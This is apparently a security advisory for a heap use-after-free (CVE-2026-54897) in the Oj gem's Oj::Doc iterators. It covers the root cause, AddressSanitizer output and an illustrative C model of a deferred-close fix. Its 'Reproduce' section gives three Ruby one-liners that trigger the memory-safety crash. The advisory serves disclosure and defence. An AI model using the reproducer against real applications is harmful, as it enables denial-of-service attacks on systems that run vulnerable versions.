PT-2026-51083 · Rubygems · Oj

Published 2026-06-19 · Updated 2026-06-19 · CVE-2026-54897

CVSS v4.0: 8.7 (High)
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

Oj::Doc iterators (each_value, each_child, each_leaf) are vulnerable to a heap use-after-free. When a Ruby block yielded during iteration calls doc.close or d.close, the document's heap memory is freed while the C iterator is still running. When control returns from the block, the iterator reads from the freed region, producing a use-after-free reachable from pure Ruby.

Version

  • Software: oj gem
  • Affected: all versions with ext/oj/fast.c
  • Latest tested: 3.17.1 (confirmed present)

Details

The iterators in ext/oj/fast.c follow the pattern:
```c
// fast.c:1505 (doc_each_child)
static VALUE doc_each_child(VALUE self, ...) {
  ...
  while (cur != NULL) {
    rb_yield(...);     // ← Ruby block executes here
    cur = cur->next;   // ← cur is now freed if the block called close()
  }
}
```

rb_yield can invoke arbitrary Ruby code, including calling close() on the Doc or any child node, which calls ruby_sized_xfree on the backing buffer. On return, the C code reads cur->next from the freed region. All three iterators are affected.
ASAN report (each_child variant):

```text
==253632==ERROR: AddressSanitizer: heap-use-after-free on address 0x5210000bd080
READ of size 8 at 0x5210000bd080 thread T0
  #0 doc_each_child /ext/oj/fast.c:1505
0x5210000bd080 is located 896 bytes inside of 4064-byte region [0x5210000bcd00, 0x5210000bdce0)
freed by thread T0 here:
  #0 free
  #1 ruby_sized_xfree (libruby-3.3.so.3.3)
```

All three iterators trigger the same freed region (fd shadow bytes):

```text
0x5210000bd080:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
```
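The root cause above is that the C loop assumes `cur` stays allocated across `rb_yield`. As an added illustration that is not Oj's code and not its fix, the stand-alone C model below shows one defensive pattern for this class of bug: the document carries an iterator depth counter, and a close() requested while an iterator is active only sets a flag; the actual free runs after the outermost loop has exited, so `cur->next` is never read from freed memory. All names here (Doc, Leaf, doc_open, doc_close, doc_each_child, g_free_count) are assumptions of the example, and the callback stands in for the Ruby block.

```c
#include <stdio.h>
#include <stdlib.h>

/* Illustrative model of the Oj::Doc iterator pattern. Not Oj's code:
 * Doc, Leaf, doc_open, doc_close, doc_each_child are assumed names. */
typedef struct Leaf {
    const char *key;
    struct Leaf *next;
} Leaf;

typedef struct Doc {
    Leaf *children;      /* singly linked list of child nodes */
    int   iter_depth;    /* > 0 while an iterator is on the C stack */
    int   close_pending; /* close() was requested during iteration */
} Doc;

/* Real deallocations, so a test can check the buffer is freed exactly once. */
static int g_free_count = 0;

/* Callback standing in for rb_yield: runs arbitrary caller code per child. */
typedef void (*leaf_cb)(Doc *doc, Leaf *leaf, void *ctx);

static Doc *doc_open(const char *const *keys, int n) {
    Doc *doc = calloc(1, sizeof *doc);
    Leaf **tail = &doc->children;
    for (int i = 0; i < n; i++) {
        Leaf *l = calloc(1, sizeof *l);
        l->key = keys[i];
        *tail = l;
        tail = &l->next;
    }
    return doc;
}

static void doc_free_now(Doc *doc) {
    Leaf *cur = doc->children;
    while (cur != NULL) {
        Leaf *next = cur->next;
        free(cur);
        cur = next;
    }
    free(doc);
    g_free_count++;
}

/* Returns 0 when freed immediately, 1 when deferred because an iterator is active. */
int doc_close(Doc *doc) {
    if (doc->iter_depth > 0) {
        doc->close_pending = 1;
        return 1;
    }
    doc_free_now(doc);
    return 0;
}

/* Visits every child. The vulnerable shape reads cur->next right after the
 * callback; here a close() from the callback only sets a flag, and the free
 * runs once the outermost iterator has finished. Returns the visit count. */
int doc_each_child(Doc *doc, leaf_cb cb, void *ctx) {
    int visited = 0;
    doc->iter_depth++;
    for (Leaf *cur = doc->children; cur != NULL; cur = cur->next) {
        cb(doc, cur, ctx);
        visited++;
    }
    doc->iter_depth--;
    if (doc->iter_depth == 0 && doc->close_pending) {
        doc_free_now(doc); /* doc is dangling from here on; never touch it again */
    }
    return visited;
}

typedef struct { int calls; int deferred; } CloseCtx;

/* Mirrors `doc.each_child { |d| d.close }`: requests close on the first child. */
static void close_on_first(Doc *doc, Leaf *leaf, void *ctx) {
    CloseCtx *c = ctx;
    (void)leaf;
    if (c->calls++ == 0) c->deferred = doc_close(doc);
}

/* Constructed scenario: three children, close requested on the first.
 * Returns the number of children visited, or -1 if the close was not deferred. */
int demo_close_during_iteration(void) {
    static const char *const keys[] = {"a", "b", "c"};
    Doc *doc = doc_open(keys, 3);
    CloseCtx c = {0, 0};
    int visited = doc_each_child(doc, close_on_first, &c);
    return c.deferred ? visited : -1;
}

/* Close with no iterator active: freed immediately, returns 0. */
int demo_close_outside_iteration(void) {
    static const char *const keys[] = {"x"};
    Doc *doc = doc_open(keys, 1);
    return doc_close(doc);
}

int main(void) {
    printf("visited=%d\n", demo_close_during_iteration());
    printf("immediate close returned %d, total frees=%d\n",
           demo_close_outside_iteration(), g_free_count);
    return 0;
}
```

The depth counter rather than a plain boolean matters because iterators can nest (an each_child block that itself iterates); the free must wait for the outermost loop. Running the model under AddressSanitizer is a quick way to confirm the deferred path produces no read of freed memory, the same check that produced the report above.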

Reproduce

```ruby
require 'oj'
# each_child
Oj::Doc.open('[1,2]') { |doc| doc.each_child { |d| d.close } }
# each_value
Oj::Doc.open('[1,2]') { |doc| doc.each_value { |v| doc.close } }
# each_leaf
Oj::Doc.open('[1,[2]]') { |doc| doc.each_leaf { |d| d.close } }
```

Fix

Use After Free


Weakness Enumeration

Related identifiers

CVE-2026-54897
GHSA-9PPP-W3G4-FH4Q

Affected products

Oj